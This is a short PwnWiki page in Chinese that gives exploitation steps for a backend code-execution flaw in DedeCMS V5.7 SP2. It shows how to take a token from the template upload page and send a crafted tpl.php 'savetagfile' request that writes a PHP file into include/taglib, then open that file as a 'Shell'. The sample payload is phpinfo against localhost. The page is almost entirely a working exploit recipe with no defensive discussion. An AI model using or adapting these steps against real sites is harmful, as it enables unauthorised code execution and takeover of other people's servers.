DedeCMS V5.7 SP2 後台代碼執行漏洞

From PwnWiki

Revision as of 09:59, 10 April 2021 by Pwnwiki (talk | contribs) (Created page with "<languages /> <translate> ==漏洞利用== </translate> <translate> 首先獲取token: <code>domain + /dede/tpl.php?action=upload</code> 通過查看頁面源碼即可...")

(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

Other languages:

Chinese • ‎português • ‎中文（台灣）‎

漏洞利用

首先獲取token: domain + /dede/tpl.php?action=upload

通過查看頁面源碼即可獲得 token

http://127.0.0.1/uploads/dede/tpl.php?action=upload

然後訪問：

http://127.0.0.1/dede/tpl.php?filename=secnote.lib.php&action=savetagfile&content=<?php phpinfo();?>&token=<TOKEN>

Shell

http://127.0.0.1/include/taglib/secnote.lib.php

Retrieved from "https://pwnwiki.com/index.php?title=DedeCMS_V5.7_SP2_後台代碼執行漏洞&oldid=1348"